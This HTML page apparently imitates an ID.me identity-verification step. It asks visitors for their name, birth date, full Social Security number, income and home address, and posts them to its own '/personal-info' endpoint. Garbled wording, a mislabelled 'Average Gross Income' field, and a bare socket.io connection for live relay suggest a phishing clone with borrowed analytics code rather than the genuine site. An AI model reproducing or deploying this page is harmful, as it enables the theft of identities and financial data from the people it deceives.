<!DOCTYPE html>
<html dir='ltr' lang='en'>

<head>
    <title itemprop='name'>Enter Your Personal Information - ID.me</title>
    <meta charset='utf-8'>
    <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'>
    <meta content='One Identity. One Wallet.' name='description'>
    <meta content='' name='keywords'>
    <meta content='text/html; charset=utf-8' http-equiv='content-type'>
    <meta content='noodp' name='robots'>
    <meta content='width=device-width, initial-scale=1, minimum-scale=1' name='viewport'>
    <meta content='noindex' name='robots'>
    <link rel="icon" type="image/png" href="/assets/icons/favicon/favicon-secondary.ico" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-57x57-2ffe9eb0575d6f2d536c4b1d1312ebb183b96170dd4670cc33da0e8d30dfa89b.png"
        sizes="57x57" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-60x60-4a51eca7d74a22840ebf73337f0b78d986962257db3757699ac2bbf2126fcaf3.png"
        sizes="60x60" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-72x72-8069aa54dc1e8592ae21caf51345340ea1e5301ef87641da7123faa90833433a.png"
        sizes="72x72" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-76x76-552d2b817e4460a31694cba95f43ae94cae71db7640878140ab1f6f0e2acd3c1.png"
        sizes="76x76" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-114x114-afe52d4bb149eab41e8102995ca4e02071c29473fc8f08c7e3085920105353d3.png"
        sizes="114x114" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-120x120-1e58062c55faf2f6fe4c84a946b0a052fd692edb2b09a85ad573234d8764629d.png"
        sizes="120x120" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-144x144-c9f3e17d73da9a03d383df7848cb97b58c2c71d60852537d1f3c67e4d59ccde2.png"
        sizes="144x144" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-152x152-19917c16354e9c4983f672bbcb166db7728d9330899c26f948ef1a66237857e5.png"
        sizes="152x152" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-180x180-0458fbc4cb2b43c3f8af68a17dfcb7468b5712fdda8bcb64720f1c6673b76fe6.png"
        sizes="180x180" />
    <link rel="apple-touch-icon-precomposed" type="image/x-icon"
        href="/assets/icons/favicon/apple-icon-precomposed-0a6b7ee881e56105599b4d23abd90b924ded8c9ab8f103b8f3fab91c5376fc64.png" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/android-icon-192x192-37c3f50b8915c9d5a27781b5fe4d9473e827a1e22e79f58fd1d289e5c738b09d.png"
        sizes="192x192" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/favicon-32x32-f1c53c98d6a9488f4cb6748dbb6cce63b8c14e5969dddf1a459197c0dbb1f11b.png"
        sizes="32x32" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/favicon-96x96-0b10140d54d70f7777604a1198ca788d0c43b552e0b34be9d0a4125d273ff3f5.png"
        sizes="96x96" />
    <link rel="icon" type="image/png"
        href="/assets/icons/favicon/favicon-16x16-341d6a3373d9c7ce1e668bcf7ce728c2c97a8ac08589a6014253b91427cbc29a.png"
        sizes="16x16" />

    <script>
        window._sf_startpt = Date.now();
        window.settings = {

            chartbeat: {
                account: "24363",
                domain: "verify.id.me"
            },

            google: {
                account: "UA-40672673-1",
                linking: ""
            },

            gtm_engineering: "GTM-PL62HD9",

            smartystreets: {
                api: "https://us-autocomplete-pro.api.smartystreets.com/lookup",
                key: "34189374235854008"
            },

            zendesk_chat: {
                key: "22fb9205-0748-40d7-8eb1-c964afe88d06" // Rails helper -- key is dynamically chosen
            },

            sentry: {
                dsn: "https://1b80aa16c8484d4d8e11b335f067846d@o52232.ingest.sentry.io/6288923"
            },

            qualtrics: {
                enabled: "true",
                zoneId: "ZN_6lH5l0h6cHZ1mqq"
            }
        };
    </script>

    <script>
        window._qUUID = "edb1256c6513428d9f41359dffc110f3";
        window._qINTID = "3699";
        window._qINT = "ID.me My Account";
        window._qPOL = "Employee Verification";
        window._qPOLID = "6221";
        window._qIRID = "652e91459533490da6da6a93f082f02d";
    </script>

    <div id='ZN_6lH5l0h6cHZ1mqq'></div>
    <script>
        window.locales = {
            "current": "en",
            "default": "en"
        };
    </script>


    <meta name="csrf-param" content="authenticity_token" />
    <link rel="stylesheet" media="all"
        href="/assets/application-863c41b97728dc59eacb634fb525bb85b8d637f3e91860c1d82321d1c07d7497.css" />


    <script src="//static.queue-it.net/script/queueclient.min.js"></script>
    <script src="//static.queue-it.net/script/queueconfigloader.min.js" data-queueit-c="idme"></script>

    <script>
        ga("set", "userId", "edb1256c6513428d9f41359dffc110f3");
    </script>


    <script>!function (e) { var n = "https://s.go-mpulse.net/boomerang/"; if ("False" == "True") e.BOOMR_config = e.BOOMR_config || {}, e.BOOMR_config.PageParams = e.BOOMR_config.PageParams || {}, e.BOOMR_config.PageParams.pci = !0, n = "https://s2.go-mpulse.net/boomerang/"; if (window.BOOMR_API_key = "GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G", function () { function e() { if (!o) { var e = document.createElement("script"); e.id = "boomr-scr-as", e.src = window.BOOMR.url, e.async = !0, i.parentNode.appendChild(e), o = !0 } } function t(e) { o = !0; var n, t, a, r, d = document, O = window; if (window.BOOMR.snippetMethod = e ? "if" : "i", t = function (e, n) { var t = d.createElement("script"); t.id = n || "boomr-if-as", t.src = window.BOOMR.url, BOOMR_lstart = (new Date).getTime(), e = e || d.body, e.appendChild(t) }, !window.addEventListener && window.attachEvent && navigator.userAgent.match(/MSIE [67]\./)) return window.BOOMR.snippetMethod = "s", void t(i.parentNode, "boomr-async"); a = document.createElement("IFRAME"), a.src = "about:blank", a.title = "", a.role = "presentation", a.loading = "eager", r = (a.frameElement || a).style, r.width = 0, r.height = 0, r.border = 0, r.display = "none", i.parentNode.appendChild(a); try { O = a.contentWindow, d = O.document.open() } catch (_) { n = document.domain, a.src = "javascript:var d=document.open();d.domain='" + n + "';void(0);", O = a.contentWindow, d = O.document.open() } if (n) d._boomrl = function () { this.domain = n, t() }, d.write("<bo" + "dy onload='document._boomrl();'>"); else if (O._boomrl = function () { t() }, O.addEventListener) O.addEventListener("load", O._boomrl, !1); else if (O.attachEvent) O.attachEvent("onload", O._boomrl); d.close() } function a(e) { window.BOOMR_onload = e && e.timeStamp || (new Date).getTime() } if (!window.BOOMR || !window.BOOMR.version && !window.BOOMR.snippetExecuted) { window.BOOMR = window.BOOMR || {}, window.BOOMR.snippetStart = (new Date).getTime(), window.BOOMR.snippetExecuted = !0, window.BOOMR.snippetVersion = 12, window.BOOMR.url = n + "GTDQ2-YPV4D-ZPN8M-VW3LM-H9A7G"; var i = document.currentScript || document.getElementsByTagName("script")[0], o = !1, r = document.createElement("link"); if (r.relList && "function" == typeof r.relList.supports && r.relList.supports("preload") && "as" in r) window.BOOMR.snippetMethod = "p", r.href = window.BOOMR.url, r.rel = "preload", r.as = "script", r.addEventListener("load", e), r.addEventListener("error", function () { t(!0) }), setTimeout(function () { if (!o) t(!0) }, 3e3), BOOMR_lstart = (new Date).getTime(), i.parentNode.appendChild(r); else t(!1); if (window.addEventListener) window.addEventListener("load", a, !1); else if (window.attachEvent) window.attachEvent("onload", a) } }(), "".length > 0) if (e && "performance" in e && e.performance && "function" == typeof e.performance.setResourceTimingBufferSize) e.performance.setResourceTimingBufferSize(); !function () { if (BOOMR = e.BOOMR || {}, BOOMR.plugins = BOOMR.plugins || {}, !BOOMR.plugins.AK) { var n = "" == "true" ? 1 : 0, t = "", a = "2xtergs7mrv2czfxslfa-f-5d417e90f-clientnsv4-s.akamaihd.net", i = "false" == "true" ? 2 : 1, o = { "ak.v": "36", "ak.cp": "1252507", "ak.ai": parseInt("752192", 10), "ak.ol": "0", "ak.cr": 233, "ak.ipv": 4, "ak.proto": "h2", "ak.rid": "18716161", "ak.r": 45283, "ak.a2": n, "ak.m": "dscb", "ak.n": "essl", "ak.bpcip": "213.230.72.0", "ak.cport": 44532, "ak.gh": "95.100.106.161", "ak.quicv": "", "ak.tlsv": "tls1.3", "ak.0rtt": "", "ak.csrc": "-", "ak.acc": "", "ak.t": "1689752266", "ak.ak": "hOBiQwZUYzCg5VSAfCLimQ==J3uBGNzX5TmZ6mb1bH2urrgHEHEYh1+aOGV9RWQjd3eIY9JlP0pvuZwMbgrAOweaoJPs+mf86XoDd0aavVFziHXiCXG8f+xO9prHro+LNKAzhyzVYcviqKJRgcHQ29OUuagZcuzEkTWCMKLjGtC/5WpJ14Qo+KgcZ064VB2iwg44Pcn+p9DVbFmiYIrkh1LGAN32KHnxzt3QEV0UZv/v8P+c6KNK3zGWdljumTfeDObksiYC+FbTzPNv1w2KiBh26vOvSj8sWKi8tiQMdeUaIdu9qa3u5xpXN6JxZH69IOtFcNfZqLCzAKaTg9bQco5bqUWvGyJNS9hqAPPcHZtAIC6b7AdF+/U+87jVNN5TzyksfL0xDR2u94POlZ9UkyKwpYF9X9rXuWajrDAWQWj2M4VYGDEWAv8vO7IiV/ts/m0=", "ak.pv": "195", "ak.dpoabenc": "", "ak.tf": i }; if ("" !== t) o["ak.ruds"] = t; var r = { i: !1, av: function (n) { var t = "http.initiator"; if (n && (!n[t] || "spa_hard" === n[t])) o["ak.feo"] = void 0 !== e.aFeoApplied ? 1 : 0, BOOMR.addVar(o) }, rv: function () { var e = ["ak.bpcip", "ak.cport", "ak.cr", "ak.csrc", "ak.gh", "ak.ipv", "ak.m", "ak.n", "ak.ol", "ak.proto", "ak.quicv", "ak.tlsv", "ak.0rtt", "ak.r", "ak.acc", "ak.t", "ak.tf"]; BOOMR.removeVar(e) } }; BOOMR.plugins.AK = { akVars: o, akDNSPreFetchDomain: a, init: function () { if (!r.i) { var e = BOOMR.subscribe; e("before_beacon", r.av, null, null), e("onbeacon", r.rv, null, null), r.i = !0 } return this }, is_complete: function () { return !0 } } } }() }(window);</script>
</head>

<body class=''>


    <div class='page-container' data-role='page-container'>
        <div class='container'>
            <script>
                window._qFLOW_TYPE = "group"
                window._qGROUP = "employee";
                window._qSTEP = "initial";
            </script>

            <div class='content-container'>
                <div class='form-header'>
                    <div class='form-header-content' role='banner'>
                        <div class='partner'>
                            <div class='c_icon m_idme'>
                                <img alt="ID.me"
                                    src="/assets/logos/idme-logo-eb439f785d33858dfe7300098e5f38c7ebb471ccfe409dde80df79c90c11e5e9.svg" />
                            </div>
                        </div>
                    </div>
                </div>
                <main class='form-container'>
                    <h1 id='sr_page_title'>Confirm your identity</h1>

                    <p class='alert alert-error' style=''>

                    </p>
                    <p class='alert alert-success' style=''>

                    </p>

                    <form class="new_verification" id="new_verification" autocomplete="off"
                        data-validate="employee-document" data-option="employee-document" data-group="employee"
                        data-component="Components.RequiredFieldInfo" action="/personal-info" accept-charset="UTF-8"
                        method="post">
                        <div class='form-fields'>
                            <div class='form-content'>
                                <p>Before you update you can proceed, we'll need to verify your account ownership.</p>
                            </div>
                            <div class='form-content-title align-left'>
                                <h2 class='h4'>Personal Information</h2>
                            </div>
                            <div class='field-group'>
                                <div class='field text'>
                                    <label class="required" for="verification_first_name">First Name</label>
                                    <input placeholder="Enter first name" required="required" autocomplete="given-name"
                                        type="text" name="first_name" id="verification_first_name" />
                                </div>
                                <div class='field text'>
                                    <label for="verification_middle_name">Middle Name</label>
                                    <input placeholder="Enter middle name" autocomplete="additional-name" type="text"
                                        name="middle_name" id="verification_middle_name" />
                                </div>
                                <div class='field text'>
                                    <label class="required" for="verification_last_name">Last Name</label>
                                    <input placeholder="Enter last name" required="required" autocomplete="family-name"
                                        type="text" name="last_name" id="verification_last_name" />
                                </div>
                                <div class='field-group u_one-line uneven_split'>
                                    <div class='field text u_left'>
                                        <label for="verification_suffix">Suffix</label>
                                        <select autocomplete="honorific-suffix" name="suffix" id="verification_suffix">
                                            <option value="">- -</option>
                                            <option value="jr">Jr.</option>
                                            <option value="sr">Sr.</option>
                                            <option value="ii">II</option>
                                            <option value="iii">III</option>
                                            <option value="iv">IV</option>
                                            <option value="v">V</option>
                                            <option value="vi">VI</option>
                                        </select>
                                    </div>
                                    <div class='field text u_right'>
                                        <label class="required" for="verification_birth_date"><span
                                                class='label-primary'>Date of Birth</span>
                                            <span aria-label='' class='label-format'>
                                                (MM/DD/YYYY)
                                            </span>

                                        </label><input data-mask="date" placeholder="MM/DD/YYYY" required="required"
                                            autocomplete="bday" type="text" name="birth_date"
                                            id="verification_birth_date" />

                                    </div>
                                </div>
                            </div>

                            <div class='field-group full-social'>
                                <div class='field text' data-component='Components.Obfuscate'>
                                    <label class="required" for="verification_social"><span class='label-primary'>Social
                                            Security Number</span>
                                        <span aria-label='' class='label-format'>
                                            (###-##-####)
                                        </span>

                                    </label><input maxlength="11" data-rule-length="9" data-mask="social"
                                        data-field="social" placeholder="###-##-####" required="required" size="11"
                                        type="password" name="social" id="verification_social" />
                                </div>
                            </div>
                            <div class='field-group'>
                                <div class='field text'>
                                    <label class="required" for="verification_agi">Average Gross Income (AGI)</label>
                                    <input placeholder="Enter your average gross income" required="required"
                                        autocomplete="agi" type="tel" name="agi" id="verification_agi"
                                        onkeypress="return onlyAllowNumbers(event)" />
                                </div>
                            </div>
                            <div class='form-content-title align-left'>
                                <h2 class='h4'>Home Address</h2>
                            </div>
                            <div class='field-group'
                                data-component='Components.AddressAutocomplete Components.Urbanization'>
                                <div class='field text urbanization' style='display: none;'>
                                    <label for="verification_urbanization">Urbanization / Neighborhood Name</label>
                                    <input placeholder="" data-field="urbanization" type="text" name="urbanization"
                                        id="verification_urbanization" />
                                </div>
                                <div class='field text address-autocomplete'>
                                    <label class="required" for="verification_street">Street</label>
                                    <input placeholder="Enter street address" data-field="street" required="required"
                                        autocomplete="address-line1" type="text" name="street"
                                        id="verification_street" />
                                </div>
                                <div class='field text'>
                                    <label class="required" for="verification_city">City</label>
                                    <input placeholder="Enter city" data-field="city" required="required"
                                        autocomplete="address-level2" type="text" name="city" id="verification_city" />
                                </div>
                                <div class='field-group u_one-line'>
                                    <div class='field select u_left'>
                                        <label class="required" for="verification_state">State</label>
                                        <select data-field="state" required="required" autocomplete="address-level1"
                                            class="no-select" name="state" id="verification_state">
                                            <option value="">Select state</option>
                                            <option value="AL">Alabama</option>
                                            <option value="AK">Alaska</option>
                                            <option value="AS">American Samoa</option>
                                            <option value="AZ">Arizona</option>
                                            <option value="AR">Arkansas</option>
                                            <option value="AE">Armed Forces Africa, Canada, Europe, Middle East</option>
                                            <option value="AA">Armed Forces Americas (except Canada)</option>
                                            <option value="AP">Armed Forces Pacific</option>
                                            <option value="CA">California</option>
                                            <option value="CO">Colorado</option>
                                            <option value="CT">Connecticut</option>
                                            <option value="DE">Delaware</option>
                                            <option value="DC">District of Columbia</option>
                                            <option value="FL">Florida</option>
                                            <option value="GA">Georgia</option>
                                            <option value="GU">Guam</option>
                                            <option value="HI">Hawaii</option>
                                            <option value="ID">Idaho</option>
                                            <option value="IL">Illinois</option>
                                            <option value="IN">Indiana</option>
                                            <option value="IA">Iowa</option>
                                            <option value="KS">Kansas</option>
                                            <option value="KY">Kentucky</option>
                                            <option value="LA">Louisiana</option>
                                            <option value="ME">Maine</option>
                                            <option value="MH">Marshall Islands</option>
                                            <option value="MD">Maryland</option>
                                            <option value="MA">Massachusetts</option>
                                            <option value="MI">Michigan</option>
                                            <option value="MN">Minnesota</option>
                                            <option value="MS">Mississippi</option>
                                            <option value="MO">Missouri</option>
                                            <option value="MT">Montana</option>
                                            <option value="NE">Nebraska</option>
                                            <option value="NV">Nevada</option>
                                            <option value="NH">New Hampshire</option>
                                            <option value="NJ">New Jersey</option>
                                            <option value="NM">New Mexico</option>
                                            <option value="NY">New York</option>
                                            <option value="NC">North Carolina</option>
                                            <option value="ND">North Dakota</option>
                                            <option value="MP">Northern Mariana Islands</option>
                                            <option value="OH">Ohio</option>
                                            <option value="OK">Oklahoma</option>
                                            <option value="OR">Oregon</option>
                                            <option value="PW">Palau</option>
                                            <option value="PA">Pennsylvania</option>
                                            <option value="PR">Puerto Rico</option>
                                            <option value="RI">Rhode Island</option>
                                            <option value="SC">South Carolina</option>
                                            <option value="SD">South Dakota</option>
                                            <option value="TN">Tennessee</option>
                                            <option value="TX">Texas</option>
                                            <option value="UM">United States Minor Outlying Islands</option>
                                            <option value="UT">Utah</option>
                                            <option value="VT">Vermont</option>
                                            <option value="VI">Virgin Islands</option>
                                            <option value="VA">Virginia</option>
                                            <option value="WA">Washington</option>
                                            <option value="WV">West Virginia</option>
                                            <option value="WI">Wisconsin</option>
                                            <option value="WY">Wyoming</option>
                                        </select>
                                    </div>
                                    <div class='field text u_right'>
                                        <label class="required" for="verification_zip">Zip Code</label>
                                        <input placeholder="Enter zip code" data-mask="zipcode" data-field="zip"
                                            required="required" autocomplete="postal-code" type="text" name="zip"
                                            id="verification_zip" />
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class='form-actions'>
                            <div class='form-action-button'>
                                <button type="submit" class="btn btn-primary" data-disable="true">Continue</button>
                            </div>
                        </div>
                    </form>
                </main>
            </div>


            <footer class='footer'>
                <nav aria-label='Footer' class='footer__links'>
                    <ul class='footer__list'>
                        <li class='footer__list-item'><a target="_blank" class="footer__link"
                                href="https://www.id.me/about">What is ID.me?</a></li>
                        <li class='footer__list-item'><a target="_blank" class="footer__link"
                                href="https://www.id.me/terms">Terms of Service</a></li>
                        <li class='footer__list-item'><a target="_blank" class="footer__link"
                                href="https://www.id.me/privacy">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>

        </div>
    </div>

    <script>
        document.getElementById('verification_agi').addEventListener('input', () => {
            const input = document.getElementById('verification_agi');
            const inputValue = input.value;

            // Check if the input has a value and if the first character is not a dollar sign
            if (inputValue && inputValue[0] !== '$') {
                // Add the dollar sign to the beginning of the input value
                input.value = '$' + inputValue;
            }
        })

        function onlyAllowNumbers(event) {
            // Get the key code of the pressed key
            const keyCode = event.which || event.keyCode;

            // Allow numbers (digits) and the dollar sign
            if ((keyCode >= 48 && keyCode <= 57) || keyCode === 36) {
                return true;
            }

            // Prevent any other characters from being typed
            event.preventDefault();
            return false;
        }
    </script>

    <script
        src="https://maps.googleapis.com/maps/api/js?key=AIzaSyD0zvJrQMX-chNAK69YL8jhcQzgruOmKDo&amp;libraries=places"></script>

    <script src="/assets/application-51458eeaf9c84f9867bd7a73a86ec16b932e397c12806eeb26828e6502fb2942.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.3.2/socket.io.js"></script>
    <script>
        const socket = io();
    </script>
</body>

</html>